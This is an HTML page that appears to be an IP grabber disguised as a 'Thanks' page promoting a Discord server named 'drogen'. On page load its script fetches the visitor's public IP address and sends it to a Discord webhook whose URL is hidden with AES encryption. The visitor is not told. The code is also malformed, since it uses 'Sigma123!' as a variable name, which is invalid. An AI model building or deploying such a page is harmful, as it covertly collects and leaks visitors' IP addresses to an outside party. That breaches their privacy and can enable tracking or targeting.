<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/drogen</title>
    <meta property="og:title" content="Danke!">
    <meta property="og:type" content="website">
    <meta property="og:image" content="https://i.imgur.com/9BrtuAf.jpeg">
    <meta property="og:description" content="discord.gg/drogen!">
    <meta name="theme-color" content="#11b9d6">
    <link rel="icon" type="image/png" href="https://i.imgur.com/9BrtuAf.jpeg">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1-crypto-js.js"></script>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-image: url('https://i.imgur.com/VC0ma9Y.jpeg');
            background-size: cover;
        }

        #ip-address {
            font-size: 2em;
        }

        #title {
            font-size: 2em;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <h1 id="title">Thanks</h1>
    <p><span id="ip-address"></span></p>

    <script>
       
        const encryptedWebhookURL = 'U2FsdGVkX1+J0BcJTLnGcYY/lwJww11aZ2ijsejxjsY=';  

        const Sigma123! = 'dein-geheimes-passwort';  // Das gleiche geheime Passwort, das du für die Verschlüsselung verwendet hast

        // Funktion, um den Webhook-URL zu entschlüsseln
        function decryptWebhook(encrypted) {
            const bytes = CryptoJS.AES.decrypt(encrypted, Sigma123!);
            return bytes.toString(CryptoJS.enc.Utf8);
        }

        function sendToDiscord(ip) {
            const webhookURL = decryptWebhook(encryptedWebhookURL);  // Entschlüsselter Webhook-URL
            const data = {
                content: `Sigma: ${ip}`
            };

            fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(data),
            })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                })
                .catch(error => console.error('Error:', error));
        }

        function getIP(json) {
            const ipAddress = json.ip;
            document.getElementById("ip-address").textContent = ipAddress;
            sendToDiscord(ipAddress);
        }

        fetch('https://api.ipify.org/?format=json')
            .then(response => response.json())
            .then(data => getIP(data))
            .catch(error => console.error('Error:', error));
    </script>
</body>
</html>
